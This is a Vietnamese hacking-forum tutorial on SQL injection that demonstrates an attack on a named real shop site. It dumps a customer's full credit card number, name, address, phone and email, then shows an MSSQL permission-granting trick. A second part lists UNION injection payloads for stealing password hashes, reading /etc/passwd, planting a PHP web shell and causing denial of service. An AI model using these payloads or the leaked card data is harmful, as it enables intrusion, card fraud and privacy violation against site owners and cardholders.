1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

select * FROM customer_testimonials WHERE testimonials_id = 25\' 
de nhan biet loi nay co hack dc nua ko ta querry them 1 chut nay de nhan biet dc 

https://www.185elgin.com/customer_te...timonial_id=25 and 1=1/*

bat ra 1 page voi gia tri true = 1 

https://www.185elgin.com/customer_te...timonial_id=25 and 1=0/*

bat ra 1 page voi gia tri false = 0

anh em du dk tren thi tien hanh hack site nha'


bay gio ta di tim site nay co bao nhieu colum de khai thac ra loi 




https://www.185elgin.com/customer_te...,3,4,5,6,7,8--

Querry từ 1-8 nhảy ra lỗi này 

Quote:

nhay ra loi 3&6 ta lay o vi tri so 3 nhe
3

6
Đinh vị lấy số 3 làm tâm điểm như dưới nha !

bay gio ta tim xem phien ban mysql cua site nay la bao nhieu de tuy bien khai thac nhe

ta nen dung ham concat_ws(0x3a,version(),user(),database() de tim nhe

https://www.185elgin.com/customer_te...)),4,5,6,7,8--

nhu vay la ver mysql 5.0.xx


Quote:

5.0.51a-community:sendmc2_script@localhost:sendmc2_185elgi n

den day ta co the khai thac theo kieu inject mysql 5.0 roai 


ta di tim table dau tien cua site nhe

https://www.185elgin.com/customer_te...0limit%201,1--



Quote:

ra tiep table dau tien la: COLLATIONS 
Meo nho cho cac tester luoi querry ra tung table mot ta lam nhu sau 


https://www.185elgin.com/customer_te...chema.tables--


Quote:


CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_ APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN _USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEG ES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVI LEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,address_book, address_format,banners,banners_history,card_surcha rges,categories,categories_description,configurati on,configuration_group,counter,counter_history,cou ntries,currencies,customer_testimonials,customers, customers_basket,customers_basket_attributes,custo mers_info,geo_zones,languages,link_categories,link _categories_description,links,links_check,links_de scription,links_featured,links_status,links_to_lin k_categories,manufacturers,manufacturers_info,news letters,orders,orders_maxmind,orders_products,orde rs_products_attributes,orders_products_download,or ders_status,orders_status_history,orders_total,pro ducts,products_attributes,products_attributes_down load,products_description,products_notifications,p roducts_options,products_options_values,products_o ptions_values_to_product
do the la ta da co table dau tien va cac cac tables cua site roi.

bay gio ta tien hanh tim table nao co chua cc nha :d

ta tien hanh querry lay tat ca cc tu table orders xem nhe'

truoc tien phai convert sang dang hex nhe

ta vao day http://www.vortex.prodigynet.co.uk/misc/ascii_conv.html
convert orders ra cai nay 0x6F7264657273

https://www.185elgin.com/customer_te...0x6F7264657273


Quote:

orders_id

6
Click here to view all testimonials




Testimonial by 4
customers_id

6
Click here to view all testimonials




Testimonial by 4
customers_name

6
Click here to view all testimonials



...........................................

Xong roi day ta lay nhung info can thiet de get cc nao

https://www.185elgin.com/customer_te...+from+orders--



Quote:


8/American Express/Alexander Cassini/371382972132008/1207/2523 3rd street//Santa Monica/90405/California/United States/310-560-1803/acassini@aol.com/2005-10-20 12:27:23

hack shop bị deny SELECT

bình thường khi query

Quote:
convert(int,(select top 1 table_name from information_schema.tables))--[
bay ra lỗi
Quote:
Syntax error converting the nvarchar value 'table_name' to a column of data type int[/b]
nhưng nếu bay ra lỗi
Quote:
SELECT permission denied on object 'sysobjects', database 'XXXXX', owner 'dbo'.
thường anh em bỏ nó or toàn chơi tool thấy ko query dc bỏ luôn.
thằng admin đã deny SELECT ,ko SELECT thì convert dc cái khỉ j` .
dùng query sau:
Quote:
;use dataname grant keyword on tables to public
trc' hết dùng convert(int,db_name()) để bít dataname,ví dụ là vnc
query fat nào

Quote:
;use vnc grant select on sysobjects to public--
hack xong ta lại deny mẹ cái select cho thằng vịt khác ko hack dc nữa

TUT hack php part2

Lỗi MySQL là một lỗi rất là thông dụng và nguy hiểm.Khác với các lỗi khác MySQL bị lỗi là cho người viết mã gây ra hay bị sai sót
Lỗi MySQL đem lại những lợi ích như thế nào?
Nó cho phép người sử dụng có thể khai thác dễ dàng vào các database.Nói rõ hơn nó cho ta thấy được những thông số có liên quan đến victim chứa lỗi.MySQL Inj có thể phá hủy tập tin hay cho phép các tập tin khác mà attacker chèn vào
Bây giờ chúng ta nhìn vào 1 số ví dụ về code php
<? php
...
$ id = $ _GET [ 'id'];
...
mysql_query ( "UNION SELECT nick FROM users WHERE id =". );..... $ id
?> 

Chúng ta cần lưu ý về phương thức lấy đoạn ma GET .Anh em hãy để ý kỹ về đoạn mã php ở trên.Chúng ta có thể thay đổi yêu cầu truy vấn dựa vào GET.Nếu nó không lọc phần [ 'id'] mà chúng ta truy vấn vào dữ liệu của victim thì có nghĩa là nó bị lỗi MySQL.
Làm sao mà biết chính xác là nó bị lỗi.Sau đấy là 1 ví dụ :


Code:
http://www.site.ru/index.php?page=1
Với 1 trang như thế ,để ta biết nó có bị dính lỗi hay ko thi ta cần thêm vào 1 ký tự như dấu '

+
Code:
http://www.site.ru/index.php?page=1
'

Và khi nó bị dính MySQL thì website sẽ gởi lại cho ta biết với 1 thông báo như sau:

+MySQL Error: mysql_query (.......) error expretion syntax ...

Câu nói ở đây có nghĩa là có 1 truy vấn đang bị lỗi về cấu trúc toán học hay thư mục.Và 99% đây là lỗi source.

Ngoài ra ta còn 1 phương các nữa là ta dùng phương thức toán học đơn giản như sau:

+
Code:
http://www.site.ru/index.php?page=2-1
Và nó trở về 1 thì 99% nó bị dính mysql.
Khi ta biết chính xác nó bị lỗi thì ta sẽ khai thác như sau.Chúng ta cần gởi 1 truy vấn sql đến victim nhưng chúng ta cần truy vấn với giá trĩ là null.Null ở đây là rỗng không có 1 giá trị xác thực.
Đây là 
+
Code:
http://www.site.ru/index.php?page=-1 union + + + select null, null / *
or
Code:
http://www.site.ru/index.php?page=99999 union + + + select null, null / *
Chúng ta sẽ sử dụng lần lượt các câu truy vấn thông dụng như:
+union select null, null 
union select null, null, null 
union select null, null, null, null 

Lệnh union ở đây chính là lênh kết nối các bảng lại với nhau.Chúng ta cứ sử dụng cho đến khi biết 9 xác có bao nhiêu bảng dữ liệu nằm trong database

+
Code:
http://www.site.ru/index.php?page=-1 union + + + select null, null, null, null, null, null / *
Sau khi đã xác định được bảng ta xét đến nó có bao nhiệu cột nằm trong bảng.Với câu lệnh sau sẽ giúp ta xác định:

+? id =- 1 + + by order +100 / *

Dĩ nhiên các cột không thể nào quá 100 cột được.Với cách thức này ta có thể nhanh chóng biết được bao nhiêu cột.Và có sai thì nó sẽ báo lổi.

Sau khi đã biết chính xác được có bao nhiêu cột thì ta sẽ thay thế các giá trị null mà hồi nãy ta truy vấn bằng các con số 9 xác như 1,2,3,..

+
Code:
http://www.site.ru/index.php?page=-1 + union + select +1,2,3,4,5,6 / *
Sau đó ta sẽ lấy 1 số thông tin như user database...Và ta cần biết 9 xác nó nằm ở cột nào mới truy vấn và tìm

+
Code:
http://www.site.ru/index.php?page=-1 + union + +1.2 select, USER (), 4,5,6 / *
Code:
http://www.site.ru/index.php?page=-1 + union + +1.2 select, VERSION (), 4,5,6 / *
Code:
http://www.site.ru/index.php?page=-1 + union + +1.2 select, DATABASE (), 4,5,6 / *
*Sau khi có được các thông tin thì ta cần làm những bước sau tùy vào ý thích của mỗi người

1-Lấy pass của thằng root(Nó là quan trọng 1 mà)
+
Code:
http://www.site.ru/index.php?page=-1 + union + +1.2 select, user, password, 5,6 mysql.user + from + / *
Và nó sẽ cho ra pass là pass hash và chúng ta dùng các chương trình crack pass để lấy mã.Ví dụ như chương trình password pro.Lưu ý phương thức lấy pass bằng câu lệnh trên ko có nghĩa lúc nào cũng cho ra pass mà còn phụ thuộc vào thằng mysql.user có chấp nhận yêu cầu của ta hay ko.

2-Đọc các bảng khác có liên quan đến thằng root:
Chúng ta có thể đọc các bảng có liên quan như:spreadsheet-type users, reg_users, admins, accounts ...


+
Code:
http://www.site.ru/index.php?page=-1 + union + +1.2 select, name, passwd, 4,5,6 + + from users / *
3-Đọc tập tin chứ trên server:
+
Code:
http://www.site.ru/index.php?page=-1 + union + +1.2 select, LOAD_FILE ( '/ etc / passwd'), 4,5,6 / *
Nếu chúng ta xác định 9 xác tập tin ta cần đọc thì phần LOAD_FILE sẽ giúp ích cho ta rất nhiều.

4-Up shell và ddos:
Chúng ta cần nhận thấy là chúng ta cần nên đưa con shell ở bên ngoài vào sao cho phù hợp 1.Và thư mục mà ta cần quan tâm và phù hợp 1 chính là "/ home / site / public_html /"

Code up shell:

+http://www.site.ru/index.php?page=-1 + union + select +1,2,3,4,5, '<? php system ($ _GET [cmd]);>' + + + from mysql.user into outfile + + '/ home / site / public_html / shell.php' / *

Việc up shell là phần quan trọng 1 đối với lỗi MYSQL.Và 1 điều quan trọng ko kém là chúng ta cần đưa thêm biến hay tham số ,cụ thể là số.Nó sẽ giúp ta thực hiện được 1 số lệnh bị giới hạn trong mysql.
Ví dụ:union select 1.2, user, pass, from 5,6 + + + users limit +5.3 / * [/ i]
Chúng sẽ thử lại 3 lần với cột số 5

Đôi khi chúng ta gặp phải 1 số cơ chế lọc hay mã hóa trong mysql.Chính vì vậy để giải quyết vấn đề loại bỏ cơ chế trên ta cần 1 câu lệnh ko kém phần quan trọng


+
Code:
http://www.site.ru/index.php?page=-1 + union + +1.2 select, AES_DECRYPT (AES_ENCRYPT (USER (), 0x71), 0x71), 4,5,6 / *
1 điều cần lưu ý là khi bộ lọc kovychku của sql được bật thì chúng ta có thể dùng đến phần LOAD_FILE
Ví dụ ta đưa vào LOAD_FILE phần đọc thư mục / etc / passwd thì chúng ta dùng đoạn code sau:

+
Code:
http://www.site.ru/index.php?page=-1 + union + +1.2 select, LOAD_FILE (char (47101116,99,47112,97115115119100)), 4,5,6 / *
Đôi khi ta bị thằng inektsiya giới hạn việc sử dụng các khoản không gian sử dụng.Để xác lập lại ta dùng các lệnh sau:
+
Code:
http://www.site.ru/index.php?page=-1 + union + +1.2 select, user, password, 5,6 mysql.user + from + / *
same

Code:
http://www.site.ru/index.php?page=-1/ ** / union / ** / select / ** / 1.2, user,
Phần cuối là dos:Chắc câu lệnh này mọi người ai cũng hiểu ha:
+
Code:
http://www.site.ru/index.php?page=-1 + BENCHMARK (10000000, BENCHMARK (10000000 md5 (current_date)))

 
Design by mkha.hero